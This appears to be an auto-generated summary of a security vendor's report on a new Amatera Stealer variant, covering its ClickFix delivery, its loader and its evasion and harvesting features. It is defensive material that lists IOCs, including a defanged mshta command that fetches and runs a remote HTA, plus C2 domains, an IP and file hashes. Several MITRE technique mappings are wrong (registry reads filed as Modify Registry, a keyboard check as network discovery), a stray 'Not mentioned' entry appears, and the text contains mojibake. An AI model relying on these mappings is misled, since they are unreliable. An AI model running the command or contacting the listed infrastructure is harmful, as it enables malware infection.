eSentire TRU intercepted an attempted delivery of Amatera Stealer in a Finance customer environment and documented major changes in its loader, evasion, and C2 encryption. The report also highlights expanded harvesting for browsers, wallets, Discord, Signal, and Downloads, along with IOCs tied to the ClickFix chain, oakenfjrod.ru, compactedtightness.cfd, and 77.91.97.244. #AmateraStealer #ClickFix #oakenfjrod.ru #compactedtightness.cfd #NetSupportRAT #SheldIO
Keypoints
- eSentire TRU intercepted an attempted Amatera Stealer delivery in a Finance industry customer environment in late April 2026.
- Amatera Stealer is a rebranded version of ACR (AcridRain) Stealer and has been active in some form since at least 2018.
- The attack chain began with ClickFix and progressed through PowerShell stages that executed 32-bit shellcode in memory.
- The shellcode loader uses reflective loading, XOR decryption, aPLib decompression, API hashing, and import resolution before invoking the payload.
- Amateraâs C2 encryption changed from AES-256-CBC to ECDH on NIST P-256 with ChaCha20-Poly1305, making network decryption much harder without memory captures.
- New evasion features include anti-debugging, hardware breakpoint checks, sandbox/VM checks, geofencing for Kaspersky and Ukrainian keyboard layouts, and XOR-encoded WoW64 SSNs.
- Harvesting has expanded significantly to include more browsers, wallet extensions, desktop wallets, Discord, Signal attachments, and the Downloads directory.
MITRE Techniques
- [T1620] Reflective Code Loading â The shellcode functions as a reflective loader that decrypts, decompresses, and transfers execution to the embedded payload (âFunctions as a reflective loader that decrypts, decompresses, and transfers execution to a DLL or EXE payload.â).
- [T1055] Process Injection â The loader maps the payloadâs sections into memory and performs reflective PE injection before execution (âthe reflective injection process begins by mapping the payloadâs sections into a newly allocated PAGE_READWRITE bufferâ).
- [T1027] Obfuscated Files or Information â The malware uses XOR, XTEA, aPLib compression, control-flow flattening, and encoded SSNs to hinder analysis (âString encryption uses XTEAâ; âSysCall SSNs are now stored XOR encodedâ).
- [T1057] Process Discovery â The malware enumerates running processes during anti-emulation and sandbox checks (âChecks if there are less than 6 running processesâ and âcompares each process nameâ).
- [T1012] Query Registry â It enumerates the Uninstall registry key to detect emulators (âenumerating the registry key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallâ).
- [T1082] System Information Discovery â It checks OS version fields and keyboard layout to decide whether to execute (âensuring LdrpHandleTlsData is only called on hosts running Windows 8.1 or higherâ; âchecks the victimâs active keyboard layoutâ).
- [T1497.001] Virtualization/Sandbox Evasion: System Checks â The malware checks for sandbox and VM-related processes and environment artifacts (âknown sandbox/VM process namesâ; âqemu-ga.exeâ; âvboxserviceâ).
- [T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks â It uses environment heuristics like installed program count and process count to detect emulation (âIf fewer than 5 subkeys are foundâ; âIf fewer than 6 processes are runningâ).
- [T1016] System Network Configuration Discovery â The malware checks the Ukrainian keyboard layout as part of geofencing (âthe low byte is checked for 0x22 (Ukrainian keyboard layout)â).
- [T1112] Modify Registry â It reads registry locations related to installed software during emulator checks (âHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallâ).
- [T1003] OS Credential Dumping â The stealer targets password managers and browser data associated with credentials and secrets (âPassword manager file globs broadened for Bitwarden, 1Password, RoboForm, and NordPassâ).
- [T1217] Browser Session Discovery â It harvests browser data, extensions, and profiles from a widened set of browsers (âBrowser targets nearly doubled (37 to 65)â).
- [T1119] Automated Collection â The file grabber searches Downloads for sensitive files and broad file patterns (âFile grabber updated to search the victimâs Downloads directoryâ).
- [T1041] Exfiltration Over C2 Channel â Exfiltrated data is compressed into zip archives and sent through the C2 channel (âEvery zip archive contains a txt file ⌠that stores the victim device fingerprintâ).
- [T1021.005] Remote Services: VNC â Not mentioned.
Indicators of Compromise
- [URL] initial delivery / dropper hosting â hxxps://download.version-516[.]com/other
- [Domain Name] second-stage dropper domain and C2 â oakenfjrod.ru, compactedtightness.cfd
- [IP Address] Amatera C2 infrastructure â 77.91.97.244
- [Command Line] ClickFix execution / encoded PowerShell launch â mshta.exe hxxps://download.version-516[.]com/other, powershell -E
- [File Hash] HTA dropper and shellcode/payload samples â 534460224e1140ca7f512daea7258a9fce40dc0daef6994d79d08bdf4ce3e4b8, e913fa5b2dd0a7fc3dbaf0a6f882b3ead9a58511bd945b6e5c478cbd2b900508
- [File Hash] unpacked Amatera Stealer â ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772, and other 1 item
Read more: https://www.esentire.com/blog/amatera-stealer-4-0-2-beta-whats-new-in-this-variant